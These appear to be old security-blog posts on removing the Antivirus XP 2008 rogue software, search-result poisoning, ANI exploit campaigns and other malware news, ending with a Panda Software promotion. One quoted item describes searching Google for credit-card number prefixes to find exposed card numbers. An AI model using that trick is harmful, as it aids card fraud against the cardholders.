Had another user who had been infected by the Antivirus XP 2008 malware, I noticed they had both hit the same website at least once, myspacecdn.com, I haven’t checked it yet as I don’t have a machine handy that I can blow out, so I will have to check it later. The main install file seems to be ccwjgn.dll which gets run from the following registry key:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonNotify, it runs the popup from a program in the TEMP folder in Windows to get you to launch the install. The process is listed as a .tmp in Task Manager, usually with a weird name like ttC.tmp.exe or something similar.
On this machine, however, they set a explorer.exe registry key here, HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options, and Windows explorer could not run, I am assuming they were redirecting it to run some other malware and then starting explorer, but Virusscan deleted the file they were using, so, Windows just sat there. You could run Task Manager by hitting control-alt-delete, so that allowed me to run regedit, navigate to the key and delete the explorer.exe value out, which then allowed Windows explorer to run. After the desktop loaded, the Antivirus XP popup came up, I ended the process using Task Manager, I deleted all the files out of the Windows temp folder, found the programs/dll files in the System 32 folder, two of them this time with the lphctp9j0ea5j.exe and blphctp9j0ea5.scr type of names and after rebooting I was able to delete the ccwjgn.dll file.
I then ran the latest version of Spybot, which found some other stuff and removed them. No more popups or nag screens trying to get her to install their malware.
Update: I thought I had it until I updated to Windows XP Service Pack 3 and after rebooting I received the daggon popup again. More deleting and rebooting, after awhile I gave up and tried the free version of AVG, it found about 40 or so driver files that were infected and cleaned those and she has been running Antivirus Xp 2008 free for a couple hours now. So, for everyone who just wants it removed without knowing how or why, run AVG as Spybot doesn’t seem to clean it yet.
The other day I had a user call me to let me know their PC was getting an error message and that her co-worker had tried to fix it for her but couldn’t. The computer was off when I got there and when it booted up, it went to a blue screen of death with the problem listed as “Panic Stack Switch”, and, although that is an actual error message, it made me believe that it was a fake message, as I had never seen it before and had not searched for any occurrences online. While I was reading the error message though, the user hit her spacebar and the blue screen immediately went away to show me one of those your infected backgrounds that malware, such as Win Antivirus 2008 uses. You can imagine my surprise as the computer should not boot into windows after a blue screen of death, so this was yet another indicator that malware was involved, so I just went about cleaning the machine.
It was infected with the AntiVirus, or Win AntiVirus, XP 2008 malware, and was surprisingly simple to remove, certainly a lot easier than other infections I had dealt with, probably because Spybot and her antivirus software was blocking portions of it. All I had to do was delete the folder the malware was in, I believe it was called rchpcg or something similar, I used the Sysinternals program autoruns to remove any programs that were set to run automatically that shouldn’t, a couple had names something like blphctp9j0ea5.scr or lphctp9j0ea5j.exe or something similar, don’t quote me on those, and I went ahead and removed some of those programs that run in the background just to check to see if their software needs updated, etc, stuff no one really needs running all the time.
Yesterday I mentioned that some Google search results contained many malicious sites trying to, among other things, install Spy-shredder, a rogue antispyware program. Google removed many of those sites, but according to the Sunbelt Blog, the same group and a new group are now re-poisoning the search results again with fresh .cn domain sites. The new group appears to be trying to get traffic to make money with, using affiliate programs, etc.
Google has removed the sites responsible for the recent massive Google poisoning attack.
However, we’re seeing indications that another attack may be on the way. We have seen another spate of websites freshly registered, using the similar .cn domains. There seem to be two different groups here. Source: HEADS UP: More Google poisoning on the way?
My advice is still good from yesterday, watch for the gibberish domain names, if it doesn’t make sense when you look at it, don’t click on it. They noted that they are not serving any exploits, but this could change very quickly at any time.
Sunbelt Software, one of the leading developers of security software and hardware, has found large amounts of websites that are there only to stuff malware onto your computer, and these websites are listed high on search terms for search engines like Google, Yahoo and Live. A user whose patches are not up to date that clicks on one of these websites, will be force fed a diet of malware that could cause their machine to just die, or worse, monitor and track everything they do online.
The good news is, if you are fully patched, you shouldn’t have much to worry about, also, if you actually look at the websites you are going to visit before you click them, you can tell if they are good results or not. All of the websites I have seen listed are nonsense name, .cn domain names, etc. Check out this image that I grabbed from the Sunbelt site.
See all of the domain names that are in the highlighted red boxes? Those are the types of domains they are using, as an example, lkasjdfkjt.com, so don’t click on any of those links, also be careful of the .cn domain names, as they are using many of those. Google has been notified of the problem and have already removed some, but I can still find some of the sites right now, so there is more work to be done.
As the guy from Hill Street Blues used to say, “Hey, lets be careful out there.”
Here are some mentions about this problem on the Sunbelt and other sites.
BREAKING: Massive amounts of malware redirects in searches The original post about this problem from Sunbelt Software, here is a follow up post from them, Malware redirects: The aftermath.
Update: Subverted search sites lead to massive malware attack in progress Trojans, rootkits, password stealers hit users who click on a bad link after a search.
Malware Poisoning Results for Innocent Searches Tens of thousands of malware-serving pages, crafted to reach a high search engine ranking, are showing up in the first page of returns from Google, Yahoo and Live.
Here are some of the latest technology stories floating around the internet today.
Wal-Mart to begin selling Dell PCs Initial word was that the Dell PCs would go on sale this weekend. A representative for Wal-Mart on Thursday morning said that the PCs are slated to be in stores on June 10, with two models each offered in a bundle priced below $700. Details on the PCs were not provided. Sam’s Club and Wal-Mart Canada stores will carry different models.
Copying HD DVD and Blu-ray discs may become legal Under a licensing agreement in its final stages, consumers may get the right to make several legal copies of HD DVD and Blu-ray Disc movies they’ve purchased, a concession by the movie industry that may quell criticism that DRM (digital rights management) technologies are too restrictive.
This is crazy. I can’t believe I just posted a story that said users MAY get the right to copy their OWN property. The movie and music industries suck and they are killing it all by themselves.
Flexible, full-color OLED On May 24, Sony unveiled what it is calling the world?s first flexible, full-color organic electroluminescent display (OLED) built on organic thin-film transistor (TFT) technology. OLEDs typically use a glass substrate, but Sony researchers developed new technology for forming organic TFT on a plastic substrate, enabling them to create a thin, lightweight and flexible full-color display.
Dell Offers Three Consumer Systems With Ubuntu 7.04 Later today, Dell will offer U.S customers three different systems with Ubuntu 7.04 installed: the XPS 410n and Dimension E520n desktops and the Inspiron E1505n notebook. These systems will be available at www.dell.com/open by 4pm CST today. Starting price for the E520n desktop and the E1505n notebook is $599; the XPS 410n starts at $849.
Why Are CC Numbers Still So Easy To Find? Some “script kiddie” tricks still work after all: Take the first 8 digits of a standard 16-digit credit card number. Search for them on Google in “nnnn nnnn” form. Since the 8-digit prefix of a given card number is often shared with many other cards, about 1/4 of credit card numbers in my random test, turned up pages that included other credit card numbers, and about 1 in 10 turned up a “treasure trove” of card numbers that were exposed through someone’s sloppily written Web app.
DOG (Distrust/Disdain of Google) moves in Me? Google is too secretive. Too unwilling to engage. Too aloof. Oh, and Eric Schmidt, Google?s CEO, has lost touch with how normal people think (if these quotes are correct, and that?s a big ?if?). If they are correct I think it?s evidence that he?s been hanging around too many advertising execs lately. Their goal is to put impulses into your mind so you take certain actions (like buy Diet Coke instead of Diet Pepsi). Believe it or not advertising execs talk like that. So, when Eric is reported to have said, during a visit to Britain this week: ?The goal is to enable Google users to be able to ask the question such as ?What shall I do tomorrow?? and ?What job shall I take??? we all get a little freaked out. We don?t want Google to know that much about us.
Windows XP SP3 in the Works – Microsoft Confirms They have confirmed service pack 3, but the date on that article is wrong, according to Microsoft the release date will be 1st half of 2008, whatever that means.
Cyber Crooks Hijack Activities of Large Web-Hosting Firm Brian Krebs talks about IPOWER Inc, on of the hosting companies that was recently featured by Stopbadware.org as one of the largest hosting companies that are currently silently installing malicious software, as detailed here, Exposing Hosting Companies with Malicious Websites. Brian says organized crime is responsible and IPOWER says it was one compromised server run by another company.
Google is failing the Microsoft litmus test If you want to evaluate the ?evil? quotient of any company?s strategy/behavior, consider how you?d feel about it if it were Microsoft in the driver seat.
Vista no panacea for PC sales Although Microsoft has characterized itself as happy with Vista adoption so far?and Bill Gates said last week at WinHEC that Microsoft had shipped 40 million copies?the release of the new operating system has not resulted in a significant bump in PC sales.
Skype Worm Variant Targets Other Instant Messaging Clients Yesterday, I discovered what appears to be a new collection of “Skype Worm” infection binaries in circulation – it uses the tried and tested methods employed by similar infections over the past few months, with the ultimate payload being the Stration Worm. Aside from that, there’s another little surprise waiting but we’ll get to that shortly…
Categories: Dell, Google, Malicious Websites, Microsoft News, Tech News Tags: Blu-ray, Dell, Disdain of Google, DOG, DRM, Google, Service Packs, Skype, Stopbadware.org, Walmart, Windows Vista, Windows XP
Looks like attackers are increasing their use of the Windows Animated Cursor Vulnerability we posted awhile back, link to the patch is here, with one group pushing it in the United States and in Europe, and another Chinese group pushing it in China. Two different attempts to exploit the same vulnerability.
There are two main attacks that comprise of the majority of these sites. The first set we believe are one of the first groups to start using the zero-day exploits in the wild. These are attacks that started in the China region and appear to be created by groups within the Asia Pacific Region. The attackers have compromised hundreds of machines and placed IFRAME’s back to the main servers that host the exploit code. In most cases the payload and motivation of these attacks is to gather credentials for online games such as lineage. Lineage is a very popular online game in Asia.
The second set of attacks started just a couple days ago appear to be from a group in Eastern Europe. This group has been placing exploit code on sites for many years now and has a very resilient infrastructure. They have used WMF, VML, and several other exploits in there routines previously. As of now they have also added the ANI attacks to their arsenal. The payload and motivation is somewhat different however as they are more known to install rootkit’s and crimeware which is designed to install form grabbing software and keyloggers in order to compromise end-user banking details. Also in the past they have installed fake anti-spyware software as a distraction and as a means to falsify someone into acquiring some anti-spyware software. Source: A tale of two ANI attacks: Same exploit, different motives, different targets
It’s amazing to me that there could be groups doing this stuff for years and getting away with it, no doubt helped by people creating websites and then abandoning them for years. Google recently starting removing the links for sites like these out of the natural search results, so, hopefully, most of the sites with their code are or will be removed soon.
Websense Security Labs announced that a new version of Warezov/Stration set of malicious code is spreading through Skype, the code does not infect the machine, but it does send a url with a link to download the code to the user’s contact list. The code, once ran, opens backdoors on the system and downloads more malicious code.
“Spammed” users receive a message that says Check up this and sends them a link to download the code. If a user clicks on the link, they are redirected until they eventually download a file named file_01.exe and they are prompted to run the program, as you usually are when you download something. The Trojan tries to send an email message through a Yahoo mail server, probably trying to contact the creator to let them know they have infected another computer, but the message fails because the mail server is not active.
This is the same method of attack as this notice on the F-Secure site, it is using a new release of the code and new download urls.
Google has started a public service that has been a long time coming if you ask me, they are putting links that say This site may harm your computer, check out this site search for a good example, kohit.net, and guess what, if you click on any of the links, you still can’t get there. You have to actually copy the url and paste it into the address bar, something most people probably won’t do.
I mentioned in August last year that Google started to show malware warnings if you click on a search result from a harmful site. Now Google shows a message below the title of a search result: “This site may harm your computer.” Even if you click on the title, you won’t be able to visit the site: Google explains you once again that the site could be dangerous and recommends you to visit another search results or to change your query. The only way to visit the site is to copy the URL and paste it in the address bar, which is not an obvious or a trivial task for an ordinary computer user. Source: Google Flags Pages that Install Malicious Software
This is great, I salute Google and the fatc that they are trying to protect their users, much as some of us ordinary webmasters, Kudos Google. Here is the explanation from Google Help.
This warning message appears with search results that we’ve identified as sites that may install malicious software on your computer. We want our users to feel safer when they search the web, and we’re continuously working to identify such dangerous sites and increase protection for our users.
Malicious software is often installed without your knowledge or permission when you visit these sites. Some examples of malicious software include programs that delete data on your computer, steal personal information such as passwords and credit card numbers, or alter your search results. Source: Why do some of my search results say “This site may harm your computer?”
This should save lots of users from clicking on bad links, and something that should’ve been done a long time ago.
Categories: Malicious Websites Tags:
Websense Security Labs has discovered that the official website of Dolphin Stadium has been compromised with malicious code. The Dolphin Stadium is currently experiencing a large number of visitors, as it is the home of Sunday’s Super Bowl XLI. The site is linked from numerous official Super Bowl websites and various Super Bowl-related search terms return links to the site.
The file that is downloaded is a NsPack-packed Trojan keylogger/backdoor, providing the attacker with full access to the compromised computer. The filename is w1c.exe and its MD5 is ad3da9674080a9edbf9e084c10e80516 Source: Malicious Website: Super Bowl XLI / Dolphin Stadium
They said they have notified the owner, but the malicious content is still being delivered. A screenshot is available on the websense site, do not visit the dolphin Stadium website, unless you want a hacker to get full access to your computer or you are sure you won’t be infected.
Your computer is like this big red shiny apple, and spyware is the ugly fat green worm eying it. If the apple has no protection (insecticide) the worm will invade it, take chunks out of here and there until the apple reaches a point where it cannot be sold or eaten. It gets thrown away & destroyed.
Spyware will equate a computer to the same fate as the apple: useless and unwanted. Unfortunately, the Internet has become this field of nothing but ugly worms. Sure, there are some clear patches here and there, but for the most part if your computer has no spyware protection – it might as well be an apple left in the middle of a worm farm. Yes. It’s that bad.
It didn’t used to be that bad; however, spyware has grown ever more complicated over the years. It used to be a simple feat to rid a computer of it. However, spyware is now being packaged (bundled) into software from even the most seemingly innocuous places and companies.
For example, Sony has just landed (November, 2005) in a pot of hot-water for releasing a software package that installed a root level spyware program whereby Sony neither disclosed its installation, nor offered a means to uninstall it until the public demanded it. Many companies sadly have alternative agendas counter to their public personas.
A computer actively surfing the internet with no spyware protection will become so infected with spyware in no time that it will essentially become unusable. Try to go to Google to do a search. Nope. Try to do some shopping. Nope. Try to disconnect from the Internet. Nope, can’t do that either. Spyware will control a computer, track wherever the surfer visits, and open a nice and wide two-way door for uploading and downloading whatever data it wants.
All hope is not lost. There are some good insecticides out there to protect your shiny apple, as well as the hair on your head; because if you get a malicious spyware program on your computer, you’ll be pulling it out by the handfuls.
One of the best programs out there for preventing the installation of spyware, as well as cleaning-up spyware infected computers, is a software package from Panda Software (www.pandasoftware.com). Panda Software fully understands how spyware works, so well in fact that their Platinum Internet Security 2006 Suite won the coveted PC WORLD?s “Best Buy” title in their November 2005 magazine issue.
Panda Software went up against all the big names; Norton, McAfee, Trend Micro, and Zone Labs and walked away as the top choice. The Panda Platinum Internet Security 2006 Suite was the only one to eliminate 100% of running processes ahead of all the others. It is a surefire worm killer.
More details about the recent report as well as where and how to buy it can be located here.